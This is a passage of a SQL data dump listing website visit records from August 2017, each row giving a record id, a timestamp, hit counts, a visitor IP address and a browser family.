5.65.81','other'),(150092,1503911202,1,1,0,0,'109.206.55.225','chrome'),(150093,1503911393,1,1,0,0,'217.182.132.5','other'),(150094,1503911465,1,1,0,0,'217.182.132.183','other'),(150095,1503911831,1,1,0,0,'217.69.133.6','other'),(150096,1503912050,1,1,0,0,'193.110.106.197','chrome'),(150097,1503912274,1,1,0,0,'164.132.162.157','other'),(150098,1503912316,1,1,0,0,'46.201.240.112','chrome'),(150099,1503912981,1,1,0,0,'217.182.132.94','other'),(150100,1503913147,1,1,0,0,'91.196.178.70','chrome'),(150101,1503913731,3,3,0,0,'91.209.11.236','other'),(150102,1503913773,2,2,0,0,'54.165.59.7','other'),(150103,1503914110,1,1,0,0,'91.196.178.70','chrome'),(150104,1503914234,1,1,0,0,'66.102.9.57','chrome'),(150105,1503914423,1,1,0,0,'217.182.132.16','other'),(150106,1503914520,1,1,0,0,'5.45.207.32','other'),(150107,1503914823,1,1,0,0,'207.46.13.177','other'),(150108,1503914890,1,1,0,0,'94.180.169.235','msie'),(150109,1503914892,1,1,0,0,'176.193.234.167','msie'),(150111,1503914896,1,1,0,0,'176.15.225.161','msie'),(150112,1503914897,1,1,0,0,'95.28.170.176','msie'),(150113,1503914903,1,1,0,0,'95.221.49.107','msie'),(150114,1503914905,1,1,0,0,'46.242.65.100','msie'),(150115,1503914907,1,1,0,0,'89.178.2.167','msie'),(150116,1503915042,1,1,0,0,'207.46.13.118','other'),(150117,1503915288,1,1,0,0,'51.255.65.55','other'),(150118,1503915512,2,2,0,0,'91.209.11.236','other'),(150119,1503915522,1,1,0,0,'178.93.148.84','firefox'),(150120,1503915949,1,1,0,0,'217.182.132.85','other'),(150121,1503916119,1,1,0,0,'91.196.178.163','chrome'),(150122,1503916211,1,1,0,0,'141.8.183.1','other'),(150123,1503916720,1,1,0,0,'141.8.183.5','other'),(150124,1503916944,1,1,0,0,'207.46.13.118','other'),(150125,1503917078,1,1,0,0,'183.87.114.130','firefox'),(150126,1503917704,1,1,0,0,'8.29.198.26','other'),(150127,1503917766,1,1,0,0,'91.209.11.236','other'),(150128,1503917853,1,1,0,0,'51.255.71.98','other'),(150129,1503917994,1,1,0,0,'91.196.179.134','chrome'),(150130,1503918144,1,1,0,0,'217.182.132.22','other'),(150131,1503918315,1,1,0,0,'5.45.207.64','other'),(150132,1503918804,1,1,0,0,'91.196.178.163','chrome'),(150133,1503919004,1,1,0,0,'51.255.65.79','other'),(150134,1503919076,1,1,0,0,'217.182.132.97','other'),(150135,1503919209,1,1,0,0,'51.255.65.92','other'),(150136,1503919299,1,1,0,0,'66.249.66.156','chrome'),(150137,1503919448,1,1,0,0,'46.200.125.53','firefox'),(150138,1503919537,1,1,0,0,'62.149.29.38','chrome'),(150139,1503919700,1,1,0,0,'91.209.11.236','other'),(150140,1503920083,1,1,0,0,'37.54.22.188','chrome'),(150141,1503920494,1,1,0,0,'91.196.178.66','firefox'),(150142,1503920757,1,1,0,0,'217.182.132.94','other'),(150143,1503921025,1,1,0,0,'51.255.65.85','other'),(150144,1503921590,2,2,0,0,'91.209.11.236','other'),(150145,1503921799,1,1,0,0,'51.255.65.82','other'),(150146,1503921961,1,1,0,0,'141.8.142.45','other'),(150147,1503922169,1,1,0,0,'51.255.71.121','other'),(150148,1503922422,1,1,0,0,'164.132.162.156','other'),(150149,1503922590,1,0,1,0,'66.249.76.109',''),(150150,1503922772,1,1,0,0,'37.9.113.94','other'),(150151,1503922794,1,1,0,0,'51.255.65.50','other'),(150152,1503922863,1,1,0,0,'217.182.132.65','other'),(150153,1503923211,1,1,0,0,'137.74.207.159','other'),(150154,1503923392,1,1,0,0,'51.255.71.130','other'),(150155,1503923466,1,1,0,0,'217.182.132.179','other'),(150156,1503923563,2,2,0,0,'173.212.247.207','other'),(150157,1503923951,2,2,0,0,'91.209.11.236','other'),(150158,1503924042,1,1,0,0,'217.182.132.61','other'),(150159,1503924602,1,1,0,0,'5.45.207.64','other'),(150160,1503924705,1,1,0,0,'207.46.13.177','other'),(150161,1503925008,1,1,0,0,'51.255.65.75','other'),(150162,1503925060,1,1,0,0,'91.196.177.46','chrome'),(150163,1503925204,1,1,0,0,'217.182.132.147','other'),(150164,1503925257,2,2,0,0,'91.209.11.236','other'),(150165,1503925338,1,1,0,0,'176.98.27.243','chrome'),(150166,1503925814,1,1,0,0,'108.59.8.80','other'),(150167,1503925848,1,1,0,0,'46.211.119.30','chrome'),(150168,1503926032,1,1,0,0,'37.9.113.195','other'),(150169,1503926557,1,1,0,0,'178.136.7.17','chrome'),(150170,1503926667,1,1,0,0,'87.250.224.150','other'),(150171,1503927348,1,1,0,0,'176.98.27.243','chrome'),(150172,1503927720,1,1,0,0,'91.209.11.236','other'),(150173,1503927879,1,1,0,0,'51.255.71.111','other'),(150174,1503928539,1,1,0,0,'8.29.198.27','other'),(150175,1503928737,1,1,0,0,'185.57.30.188','firefox'),(150176,1503929108,1,1,0,0,'51.255.71.126','other'),(150177,1503929158,2,2,0,0,'91.209.11.236','other'),(150178,1503929644,2,2,0,0,'95.108.181.63','other'),(150179,1503929707,1,1,0,0,'185.137.18.38','chrome'),(150180,1503929869,1,1,0,0,'188.166.28.124','chrome'),(150181,1503929881,1,1,0,0,'217.182.132.37','other'),(150182,1503929932,1,1,0,0,'5.45.207.32','other'),(150183,1503931231,1,1,0,0,'62.149.29.38','chrome'),(150184,1503931578,1,1,0,0,'217.182.132.61','other'),(150185,1503931706,1,1,0,0,'217.182.132.185','other'),(150186,1503931866,1,1,0,0,'51.255.65.15','other'),(150187,1503931870,1,1,0,0,'91.196.178.101','chrome'),(150188,1503932075,1,1,0,0,'37.9.113.138','other'),(150189,1503932108,1,1,0,0,'51.255.65.67','other'),(150190,1503932290,1,1,0,0,'91.196.178.66','firefox'),(150191,1503932700,1,1,0,0,'91.209.11.236','other'),(150192,1503932724,1,1,0,0,'137.74.203.194','other'),(150193,1503933076,1,1,0,0,'217.182.132.65','other'),(150194,1503933738,1,1,0,0,'217.182.132.178','other'),(150195,1503934012,1,1,0,0,'121.32.126.192','msie'),(150196,1503934615,1,1,0,0,'164.132.162.156','other'),(150197,1503934617,1,1,0,0,'217.182.132.87','other'),(150198,1503934628,1,1,0,0,'217.69.133.203','other'),(150199,1503934670,1,1,0,0,'51.255.65.30','other'),(150200,1503935566,1,1,0,0,'51.255.65.64','other'),(150201,1503936163,1,1,0,0,'51.255.65.69','other'),(150202,1503936164,1,1,0,0,'37.9.113.94','other'),(150203,1503936257,1,1,0,0,'91.196.178.39','chrome'),(150204,1503936269,1,1,0,0,'95.108.181.69','other'),(150205,1503936283,1,1,0,0,'91.124.83.231','chrome'),(150206,1503936298,1,1,0,0,'51.255.71.131','other'),(150207,1503936532,1,1,0,0,'66.249.76.109','chrome'),(150208,1503937012,1,1,0,0,'37.115.109.220','other'),(150209,1503937336,1,1,0,0,'37.9.113.163','other'),(150210,1503937363,2,2,0,0,'91.209.11.236','other'),(150211,1503937392,1,1,0,0,'51.255.71.110','other'),(150212,1503937783,1,1,0,0,'207.46.13.28','other'),(150213,1503937875,1,1,0,0,'217.182.132.241','other'),(150214,1503937948,1,1,0,0,'137.74.201.100','other'),(150215,1503937953,1,1,0,0,'163.172.255.19','chrome'),(150216,1503938320,1,1,0,0,'178.154.200.7','other'),(150217,1503938511,2,2,0,0,'5.45.207.32','other'),(150218,1503938693,1,1,0,0,'66.249.66.156','chrome'),(150219,1503939162,1,1,0,0,'141.8.142.45','other'),(150220,1503939234,1,1,0,0,'188.32.189.118','chrome'),(150221,1503939373,1,1,0,0,'8.29.198.25','other'),(150222,1503939962,2,2,0,0,'91.209.11.236','other'),(150223,1503939984,1,1,0,0,'95.108.181.63','other'),(150224,1503940043,1,1,0,0,'51.255.71.122','other'),(150225,1503940602,1,1,0,0,'217.182.132.149','other'),(150226,1503940839,1,0,1,0,'66.249.66.155',''),(150227,1503940853,1,1,0,0,'51.255.65.56','other'),(150228,1503941399,1,1,0,0,'141.8.142.45','other'),(150229,1503941542,1,1,0,0,'92.113.174.96','chrome'),(150230,1503942433,1,1,0,0,'5.45.207.64','other'),(150231,1503942622,1,1,0,0,'141.8.142.45','other'),(150232,1503942696,1,1,0,0,'217.182.132.93','other'),(150233,1503943134,1,1,0,0,'141.8.142.21','other'),(150234,1503943151,1,1,0,0,'141.8.183.1','other'),(150235,1503943197,1,1,0,0,'91.196.178.40','chrome'),(150236,1503943313,1,1,0,0,'51.255.71.127','other'),(150237,1503943638,1,1,0,0,'141.8.142.45','other'),(150238,1503943660,1,1,0,0,'207.46.13.177','other'),(150239,1503944112,1,1,0,0,'137.74.207.161','other'),(150240,1503944301,1,1,0,0,'217.182.132.36','other'),(150241,1503944357,1,1,0,0,'51.255.65.69','other'),(150242,1503944362,1,1,0,0,'217.182.132.35','other'),(150243,1503944606,1,1,0,0,'217.182.132.55','other'),(150244,1503944720,1,0,1,0,'66.249.76.93',''),(150245,1503944827,1,1,0,0,'5.255.253.4','other'),(150246,1503945354,1,1,0,0,'91.196.178.167','chrome'),(150247,1503945843,1,1,0,0,'91.196.178.166','chrome'),(150248,1503945910,1,1,0,0,'178.154.200.7','other'),(150249,1503945912,1,1,0,0,'51.255.65.24','other'),(150250,1503946185,1,1,0,0,'141.8.142.21','other'),(150251,1503946562,1,1,0,0,'37.9.113.180','other'),(150252,1503946649,1,1,0,0,'95.108.181.63','other'),(150253,1503946671,1,1,0,0,'51.255.65.26','other'),(150254,1503947720,1,1,0,0,'178.154.200.7','other'),(150255,1503948115,1,1,0,0,'164.132.162.155','other'),(150256,1503948492,1,1,0,0,'37.9.113.163','other'),(150257,1503949421,1,1,0,0,'51.255.65.69','other'),(150258,1503949696,1,1,0,0,'217.182.132.62','other'),(150259,1503949829,4,4,0,0,'95.85.3.122','other'),(150260,1503950209,1,1,0,0,'8.29.198.27','other'),(150261,1503951331,1,1,0,0,'137.74.207.159','other'),(150262,1503951356,1,1,0,0,'95.85.3.122','other'),(150263,1503951986,1,1,0,0,'51.255.65.10','other'),(150264,1503952368,1,1,0,0,'51.255.65.97','other'),(150265,1503952743,1,1,0,0,'51.255.65.81','other'),(150266,1503952793,1,1,0,0,'5.45.207.32','other'),(150267,1503953185,1,1,0,0,'137.74.203.194','other'),(150268,1503953187,1,1,0,0,'217.182.132.177','other'),(150269,1503953511,1,1,0,0,'164.132.162.158','other'),(150270,1503953708,1,1,0,0,'213.180.203.32','other'),(150271,1503953714,1,1,0,0,'137.74.207.101','other'),(150272,1503953739,1,1,0,0,'164.132.164.180','other'),(150273,1503953833,1,1,0,0,'37.9.113.163','other'),(150274,1503953879,1,1,0,0,'217.182.132.73','other'),(150275,1503953940,1,1,0,0,'51.255.65.29','other'),(150276,1503954068,1,1,0,0,'151.80.27.118','other'),(150277,1503954135,1,1,0,0,'51.255.71.122','other'),(150278,1503954196,1,1,0,0,'178.154.200.7','other'),(150279,1503955076,2,2,0,0,'141.8.183.5','other'),(150280,1503955228,1,1,0,0,'51.255.65.32','other'),(150281,1503955404,1,1,0,0,'51.255.65.22','other'),(150282,1503956110,1,1,0,0,'217.182.132.87','other'),(150283,1503956199,1,1,0,0,'141.8.142.45','other'),(150284,1503956229,1,1,0,0,'141.8.183.5','other'),(150285,1503956347,3,3,0,0,'91.209.11.236','other'),(150286,1503956524,1,1,0,0,'51.255.65.224','other'),(150287,1503957282,1,1,0,0,'137.74.201.99','other'),(150288,1503957571,1,1,0,0,'51.255.71.114','other'),(150289,1503957576,1,1,0,0,'217.182.132.157','other'),(150290,1503958710,1,1,0,0,'217.182.132.82','other'),(150291,1503959010,1,1,0,0,'37.9.113.78','other'),(150292,1503959276,1,1,0,0,'51.255.65.4','other'),(150293,1503959559,1,1,0,0,'51.255.65.44','other'),(150294,1503959599,1,1,0,0,'217.182.132.153','other'),(150295,1503959694,2,0,2,0,'66.249.76.89',''),(150296,1503959855,1,1,0,0,'151.80.27.116','other'),(150297,1503960276,1,1,0,0,'5.45.207.64','other'),(150298,1503960743,1,1,0,0,'66.249.76.93','chrome'),(150299,1503960913,1,1,0,0,'51.255.71.120','other'),(150300,1503961046,1,1,0,0,'8.29.198.27','other'),(150301,1503961207,1,1,0,0,'207.46.13.118','other'),(150302,1503961256,1,1,0,0,'137.74.207.159','other'),(150303,1503961294,1,1,0,0,'217.182.132.29','other'),(150304,1503961505,2,2,0,0,'91.209.11.236','other'),(150305,1503961585,1,1,0,0,'151.80.27.116','other'),(150306,1503961648,1,1,0,0,'51.255.71.130','other'),(150307,1503961793,1,1,0,0,'217.182.132.157','other'),(150308,1503962142,2,2,0,0,'40.77.167.109','other'),(150309,1503962304,1,1,0,0,'217.182.132.36','other'),(150310,1503962329,1,1,0,0,'217.182.132.52','other'),(150311,1503962403,1,1,0,0,'51.255.65.89','other'),(150312,1503963268,1,0,1,0,'66.249.66.75',''),(150313,1503963508,1,0,1,0,'66.249.76.91',''),(150314,1503963597,1,0,1,0,'66.249.76.89',''),(150315,1503965040,1,1,0,0,'91.209.11.236','other'),(150316,1503965237,1,1,0,0,'66.249.76.91','chrome'),(150317,1503965789,3,3,0,0,'5.9.60.241','other'),(150318,1503965875,2,2,0,0,'141.8.183.5','other'),(150319,1503966381,1,1,0,0,'95.108.181.63','other'),(150320,1503967113,1,1,0,0,'217.69.133.194','other'),(150321,1503968417,2,2,0,0,'91.209.11.236','other'),(150322,1503968732,1,1,0,0,'207.46.13.118','other'),(150323,1503969854,1,1,0,0,'91.209.11.236','other'),(150324,1503970085,1,1,0,0,'5.45.207.32','other'),(150325,1503971058,2,2,0,0,'91.209.11.236','other'),(150326,1503971879,1,1,0,0,'8.29.198.26','other'),(150327,1503972443,1,1,0,0,'95.108.181.69','other'),(150328,1503972800,1,1,0,0,'217.182.132.4','other'),(150329,1503973376,1,1,0,0,'137.74.207.108','other'),(150330,1503973571,1,1,0,0,'51.255.65.53','other'),(150331,1503973591,1,1,0,0,'217.182.132.64','other'),(150332,1503973752,1,1,0,0,'95.108.181.63','other'),(150333,1503973930,1,1,0,0,'95.108.181.69','other'),(150334,1503976045,1,1,0,0,'51.255.65.92','other'),(150335,1503976074,1,1,0,0,'5.45.207.64','other'),(150336,1503976092,1,1,0,0,'5.45.207.32','other'),(150337,1503976102,1,1,0,0,'217.182.132.96','other'),(150338,1503976529,1,1,0,0,'137.74.207.164','other'),(150339,1503976747,1,1,0,0,'217.182.132.73','other'),(150340,1503976930,1,1,0,0,'66.249.66.155','chrome'),(150341,1503977007,1,1,0,0,'164.132.162.187','other'),(150342,1503977355,1,1,0,0,'51.255.65.12','other'),(150343,1503978037,1,1,0,0,'51.255.71.120','other'),(150344,1503978431,1,1,0,0,'217.182.132.18','other'),(150345,1503978717,1,1,0,0,'51.255.65.87','other'),(150346,1503979666,1,1,0,0,'66.249.76.107','chrome'),(150347,1503979924,1,1,0,0,'54.246.213.11','other'),(150348,1503980008,1,0,1,0,'66.249.66.75',''),(150349,1503980307,1,1,0,0,'141.8.142.45','other'),(150350,1503980446,1,1,0,0,'141.8.183.5','other'),(150351,1503980480,1,1,0,0,'51.255.65.65','other'),(150352,1503980632,1,1,0,0,'137.74.207.164','other'),(150353,1503980669,1,1,0,0,'51.255.65.81','other'),(150354,1503981501,1,1,0,0,'178.154.200.7','other'),(150355,1503982325,1,1,0,0,'91.196.178.66','firefox'),(150356,1503982440,1,1,0,0,'5.45.207.32','other'),(150357,1503982712,1,1,0,0,'8.29.198.26','other'),(150358,1503982716,1,1,0,0,'217.182.132.31','other'),(150359,1503982946,1,1,0,0,'217.182.132.82','other'),(150360,1503984046,1,1,0,0,'51.255.65.21','other'),(150361,1503984267,1,1,0,0,'51.255.65.92','other'),(150362,1503984494,1,1,0,0,'213.180.203.32','other'),(150363,1503984945,1,1,0,0,'141.8.142.21','other'),(150364,1503985012,1,1,0,0,'217.182.132.181','other'),(150365,1503985334,1,1,0,0,'51.255.65.6','other'),(150366,1503985378,1,1,0,0,'178.154.200.7','other'),(150367,1503985483,1,1,0,0,'217.182.132.90','other'),(150368,1503985575,1,1,0,0,'217.69.133.203','other'),(150369,1503985725,1,1,0,0,'51.255.71.126','other'),(150370,1503985967,1,1,0,0,'37.9.113.180','other'),(150371,1503986011,1,1,0,0,'37.110.150.20','msie'),(150372,1503986291,1,1,0,0,'178.154.200.7','other'),(150373,1503986689,1,1,0,0,'217.182.132.29','other'),(150374,1503986713,1,1,0,0,'91.209.11.236','other'),(150375,1503986720,1,1,0,0,'66.102.9.57','chrome'),(150376,1503987104,1,1,0,0,'207.46.13.177','other'),(150377,1503987158,1,1,0,0,'141.8.142.21','other'),(150378,1503987211,1,1,0,0,'5.45.207.64','other'),(150379,1503987287,1,1,0,0,'95.108.181.69','other'),(150380,1503987637,1,1,0,0,'188.166.70.20','chrome'),(150381,1503987829,1,1,0,0,'91.196.178.168','chrome'),(150382,1503987926,1,1,0,0,'217.182.132.66','other'),(150383,1503988257,1,0,1,0,'66.249.66.74',''),(150384,1503988874,1,1,0,0,'51.255.65.51','other'),(150385,1503988948,1,1,0,0,'217.182.132.60','other'),(150386,1503989135,1,1,0,0,'91.196.177.46','firefox'),(150387,1503989518,1,1,0,0,'92.113.37.186','chrome'),(150388,1503989527,1,0,1,0,'66.249.76.93',''),(150389,1503989731,1,1,0,0,'91.196.178.135','chrome'),(150390,1503989748,1,1,0,0,'37.9.113.180','other'),(150391,1503989820,2,0,2,0,'66.249.76.89',''),(150392,1503990363,1,0,1,0,'66.249.66.74',''),(150393,1503990457,1,1,0,0,'95.108.181.63','other'),(150394,1503990510,2,2,0,0,'5.45.207.32','other'),(150395,1503990550,1,1,0,0,'141.8.142.43','other'),(150396,1503990580,1,1,0,0,'51.255.65.96','other'),(150397,1503990645,1,1,0,0,'95.108.181.69','other'),(150398,1503990648,1,1,0,0,'95.108.181.58','other'),(150399,1503990747,1,1,0,0,'180.76.15.17','other'),(150400,1503991036,1,1,0,0,'176.31.231.10','other'),(150401,1503991067,126,126,0,0,'178.238.229.84','other'),(150402,1503991243,1,1,0,0,'141.8.183.1','other'),(150403,1503991307,1,1,0,0,'213.180.203.32','other'),(150404,1503991672,1,1,0,0,'137.74.207.119','other'),(150405,1503991688,2,2,0,0,'141.8.183.5','other'),(150406,1503991970,92,92,0,0,'178.238.229.84','other'),(150407,1503992136,1,0,1,0,'66.249.76.91',''),(150408,1503992144,3,0,3,0,'66.249.66.75',''),(150409,1503992527,1,1,0,0,'5.45.207.26','other'),(150410,1503992791,1,0,1,0,'66.249.66.76',''),(150411,1503992863,1,0,1,0,'66.249.66.74',''),(150412,1503992871,49,49,0,0,'178.238.229.84','other'),(150413,1503992928,1,1,0,0,'163.172.255.19','chrome'),(150414,1503992998,1,1,0,0,'141.8.183.5','other'),(150415,1503993208,1,1,0,0,'217.182.132.177','other'),(150416,1503993527,1,1,0,0,'164.132.162.160','other'),(150417,1503993548,1,1,0,0,'8.29.198.27','other'),(150418,1503993639,1,1,0,0,'93.74.212.147','firefox'),(150419,1503994089,1,1,0,0,'217.182.132.18','other'),(150420,1503994189,1,0,1,0,'66.249.76.108',''),(150421,1503994319,1,1,0,0,'217.182.132.80','other'),(150422,1503994343,1,1,0,0,'188.166.70.20','chrome'),(150423,1503994359,1,1,0,0,'217.182.132.61','other'),(150424,1503994435,1,1,0,0,'37.9.113.163','other'),(150425,1503994638,1,1,0,0,'141.8.142.21','other'),(150426,1503995420,1,0,1,0,'66.249.66.75',''),(150427,1503996085,1,1,0,0,'137.74.207.109','other'),(150428,1503996200,1,1,0,0,'91.196.178.69','chrome'),(150429,1503996284,1,1,0,0,'46.219.235.205','chrome'),(150430,1503996335,1,1,0,0,'51.255.71.110','other'),(150431,1503996359,1,0,1,0,'66.249.76.91',''),(150432,1503996406,1,0,1,0,'66.249.76.108',''),(150433,1503996407,1,1,0,0,'51.255.65.50','other'),(150434,1503996432,1,0,1,0,'66.249.66.76',''),(150435,1503996510,1,0,1,0,'66.249.76.89',''),(150436,1503996575,1,1,0,0,'91.196.178.67','firefox'),(150437,1503996814,1,1,0,0,'91.196.178.67','chrome'),(150438,1503997027,1,1,0,0,'51.255.65.6','other'),(150439,1503997086,1,1,0,0,'178.95.251.48','chrome'),(150440,1503997235,1,1,0,0,'217.182.132.33','other'),(150441,1503997299,13,13,0,0,'208.110.93.78','other'),(150442,1503997584,1,1,0,0,'5.45.207.64','other'),(150443,1503998331,2,0,2,0,'66.249.66.75',''),(150444,1503998373,3,0,3,0,'66.249.76.91',''),(150445,1503998381,1,1,0,0,'91.196.178.67','firefox'),(150446,1503998412,1,1,0,0,'216.244.66.237','other'),(150447,1503998478,1,0,1,0,'66.249.76.89',''),(150448,1503998658,1,0,1,0,'66.249.76.93',''),(150449,1503999555,1,1,0,0,'62.149.29.38','firefox'),(150450,1503999743,1,1,0,0,'91.196.178.70','firefox'),(150451,1503999746,1,1,0,0,'91.196.178.67','firefox'),(150452,1503999752,1,1,0,0,'51.255.65.67','other'),(150453,1504000017,1,1,0,0,'37.55.224.67','chrome'),(150454,1504000306,1,1,0,0,'51.255.65.77','other'),(150455,1504000652,1,1,0,0,'91.209.11.236','other'),(150456,1504000723,1,1,0,0,'91.124.83.231','chrome'),(150457,1504000805,1,1,0,0,'51.255.65.26','other'),(150458,1504000808,4,0,4,0,'66.249.76.93',''),(150459,1504000816,3,0,3,0,'66.249.66.74',''),(150460,1504000846,1,0,1,0,'66.249.76.89',''),(150461,1504001025,1,0,1,0,'66.249.76.91',''),(150462,1504001081,1,1,0,0,'217.69.133.4','other'),(150463,1504001183,1,1,0,0,'81.1.242.33','other'),(150464,1504002610,1,1,0,0,'163.172.255.19','chrome'),(150465,1504002635,1,1,0,0,'217.69.133.3','other'),(150466,1504002746,1,1,0,0,'185.151.105.50','chrome'),(150467,1504002834,1,1,0,0,'164.132.162.157','other'),(150468,1504003018,1,1,0,0,'141.8.142.21','other'),(150469,1504003230,2,0,2,0,'66.249.66.74',''),(150470,1504003260,1,0,1,0,'66.249.76.91',''),(150471,1504003786,1,1,0,0,'51.255.65.37','other'),(150472,1504003790,1,1,0,0,'66.249.76.91','chrome'),(150473,1504004392,1,1,0,0,'8.29.198.27','other'),(150474,1504004553,1,0,1,0,'68.180.228.221',''),(150475,1504004865,1,0,1,0,'66.249.76.89',''),(150476,1504004919,1,1,0,0,'178.94.26.175','opera'),(150477,1504004958,1,1,0,0,'141.8.142.21','other'),(150478,1504004989,1,1,0,0,'62.149.29.38','chrome'),(150479,1504005165,1,1,0,0,'94.179.56.121','chrome'),(150480,1504005302,1,1,0,0,'91.209.11.236','other'),(150481,1504005728,1,1,0,0,'54.165.59.7','other'),(150482,1504005742,1,1,0,0,'5.45.207.32','other'),(150483,1504006243,1,1,0,0,'51.255.65.91','other'),(150484,1504006439,1,0,1,0,'66.249.76.89',''),(150485,1504006664,1,1,0,0,'91.209.11.236','other'),(150486,1504007624,1,1,0,0,'51.255.71.116','other'),(150487,1504007743,1,1,0,0,'91.196.178.167','chrome'),(150488,1504007868,1,1,0,0,'217.182.132.188','other'),(150489,1504007960,1,1,0,0,'217.182.132.87','other'),(150490,1504008929,1,1,0,0,'91.232.157.98','chrome'),(150491,1504009585,1,1,0,0,'51.255.71.131','other'),(150492,1504009660,2,0,2,0,'66.249.66.76',''),(150493,1504010161,1,1,0,0,'5.45.207.64','other'),(150494,1504010308,1,1,0,0,'217.182.132.184','other'),(150495,1504010324,1,0,1,0,'66.249.76.91',''),(150496,1504010376,1,0,1,0,'66.249.66.75',''),(150497,1504010511,1,0,1,0,'66.249.66.74',''),(150498,1504010633,1,1,0,0,'217.182.132.60','other'),(150499,1504010720,1,1,0,0,'51.255.64.106','other'),(150500,1504010994,1,1,0,0,'180.76.15.145','other'),(150501,1504011075,1,1,0,0,'95.132.95.163','firefox'),(150502,1504011222,1,1,0,0,'37.54.23.3','chrome'),(150503,1504011600,1,1,0,0,'217.182.132.75','other'),(150504,1504011728,1,1,0,0,'95.132.17.93','msie'),(150505,1504011879,1,1,0,0,'141.8.142.21','other'),(150506,1504011895,1,1,0,0,'91.196.178.161','chrome'),(150507,1504011945,1,1,0,0,'51.255.65.42','other'),(150508,1504011968,1,1,0,0,'217.182.132.156','other'),(150509,1504012619,1,1,0,0,'91.209.11.236','other'),(150510,1504012620,1,1,0,0,'51.255.65.63','other'),(150511,1504013419,1,1,0,0,'51.255.71.120','other'),(150512,1504013941,1,0,1,0,'66.249.66.74',''),(150513,1504014049,1,1,0,0,'46.28.93.163','chrome'),(150514,1504014414,1,1,0,0,'180.76.15.27','other'),(150515,1504014522,1,1,0,0,'141.8.183.1','other'),(150516,1504014692,1,1,0,0,'141.8.142.21','other'),(150517,1504014704,1,1,0,0,'217.182.132.147','other'),(150518,1504014705,1,1,0,0,'40.77.167.109','other'),(150519,1504014898,1,1,0,0,'217.182.132.79','other'),(150520,1504015227,1,1,0,0,'8.29.198.25','other'),(150521,1504015247,1,1,0,0,'217.182.132.37','other'),(150522,1504015360,1,1,0,0,'51.255.65.95','other'),(150523,1504015373,2,2,0,0,'91.209.11.236','other'),(150524,1504015587,1,1,0,0,'5.45.207.32','other'),(150525,1504015896,1,0,1,0,'66.249.76.89',''),(150526,1504015986,1,0,1,0,'66.249.66.74',''),(150527,1504016125,1,1,0,0,'217.182.132.70','other'),(150528,1504016853,1,1,0,0,'51.255.65.90','other'),(150529,1504016975,2,2,0,0,'91.209.11.236','other'),(150530,1504017033,1,1,0,0,'137.74.207.164','other'),(150531,1504017266,1,1,0,0,'51.255.65.78','other'),(150532,1504017432,1,1,0,0,'81.1.242.33','other'),(150533,1504017567,1,1,0,0,'87.250.224.150','other'),(150534,1504018056,1,1,0,0,'46.165.197.142','other'),(150535,1504018095,1,1,0,0,'157.55.39.74','other'),(150536,1504018147,1,1,0,0,'217.182.132.172','other'),(150537,1504018415,1,1,0,0,'180.76.15.28','other'),(150538,1504018623,1,1,0,0,'217.182.132.37','other'),(150539,1504018700,1,1,0,0,'91.196.178.67','firefox'),(150540,1504019059,1,1,0,0,'217.182.132.5','other'),(150541,1504019082,1,1,0,0,'51.255.65.50','other'),(150542,1504019393,1,1,0,0,'164.132.162.187','other'),(150543,1504019662,1,1,0,0,'91.209.11.236','other'),(150544,1504019724,1,1,0,0,'51.255.65.65','other'),(150545,1504020224,1,1,0,0,'91.196.178.40','chrome'),(150546,1504020621,1,1,0,0,'141.8.183.5','other'),(150547,1504021114,1,1,0,0,'91.196.178.68','firefox'),(150548,1504021520,1,1,0,0,'91.209.11.236','other'),(150549,1504022377,1,0,1,0,'66.249.76.109',''),(150550,1504022506,1,1,0,0,'217.182.132.73','other'),(150551,1504022627,1,1,0,0,'217.182.132.79','other'),(150552,1504022734,1,1,0,0,'217.182.132.82','other'),(150553,1504022753,2,2,0,0,'91.209.11.236','other'),(150554,1504022875,1,1,0,0,'37.54.23.3','chrome'),(150555,1504023062,1,1,0,0,'51.255.65.8','other'),(150556,1504023402,1,1,0,0,'137.74.207.109','other'),(150557,1504023511,1,1,0,0,'217.182.132.90','other'),(150558,1504023653,2,2,0,0,'95.132.95.163','firefox'),(150559,1504023818,1,1,0,0,'217.182.132.21','other'),(150560,1504024330,1,1,0,0,'207.46.13.113','other'),(150561,1504024335,1,1,0,0,'95.108.181.63','other'),(150562,1504024596,1,1,0,0,'95.132.95.163','firefox'),(150563,1504024636,1,1,0,0,'91.209.11.236','other'),(150564,1504025133,1,1,0,0,'217.182.132.176','other'),(150565,1504025513,1,1,0,0,'95.132.95.163','firefox'),(150566,1504026061,1,1,0,0,'8.29.198.25','other'),(150567,1504026209,1,1,0,0,'178.92.84.75','chrome'),(150568,1504026731,1,1,0,0,'91.209.11.236','other'),(150569,1504026828,1,1,0,0,'163.172.255.19','chrome'),(150570,1504026975,1,1,0,0,'51.255.65.42','other'),(150571,1504027269,1,1,0,0,'217.182.132.62','other'),(150572,1504027783,1,1,0,0,'5.45.207.64','other'),(150573,1504028231,1,1,0,0,'217.182.132.240','other'),(150574,1504028399,1,1,0,0,'217.182.132.64','other'),(150575,1504028542,3,3,0,0,'91.209.11.236','other'),(150576,1504029670,1,1,0,0,'217.182.132.7','other'),(150577,1504029826,1,1,0,0,'51.255.65.32','other'),(150578,1504029831,1,0,1,0,'66.249.76.89',''),(150579,1504030099,2,2,0,0,'91.209.11.236','other'),(150580,1504030195,1,1,0,0,'51.255.65.18','other'),(150581,1504030236,1,1,0,0,'137.74.207.108','other'),(150582,1504030332,1,1,0,0,'95.108.181.69','other'),(150583,1504030419,1,1,0,0,'5.45.207.32','other'),(150584,1504030641,1,1,0,0,'164.132.162.164','other'),(150585,1504030843,1,1,0,0,'141.8.183.1','other'),(150586,1504031009,1,1,0,0,'51.255.65.54','other'),(150587,1504031503,1,1,0,0,'217.182.132.76','other'),(150588,1504032386,1,1,0,0,'37.54.23.3','chrome'),(150589,1504032551,2,2,0,0,'51.255.65.50','other'),(150590,1504032951,1,1,0,0,'164.132.162.153','other'),(150591,1504032989,1,1,0,0,'217.182.132.155','other'),(150592,1504033057,1,1,0,0,'62.149.29.38','firefox'),(150593,1504033073,1,1,0,0,'91.196.178.40','chrome'),(150594,1504033467,1,1,0,0,'91.196.178.129','chrome'),(150595,1504033827,1,1,0,0,'217.182.132.152','other'),(150596,1504034326,1,1,0,0,'66.249.66.76','chrome'),(150597,1504034887,1,1,0,0,'217.182.132.20','other'),(150598,1504034902,1,1,0,0,'81.1.242.33','other'),(150599,1504034903,1,1,0,0,'81.1.242.33','msie'),(150600,1504035986,6,6,0,0,'173.234.153.122','other'),(150601,1504036777,1,1,0,0,'91.196.178.167','chrome'),(150602,1504036892,1,1,0,0,'8.29.198.25','other'),(150603,1504037061,1,1,0,0,'217.182.132.191','other'),(150604,1504037154,1,0,1,0,'66.249.76.108',''),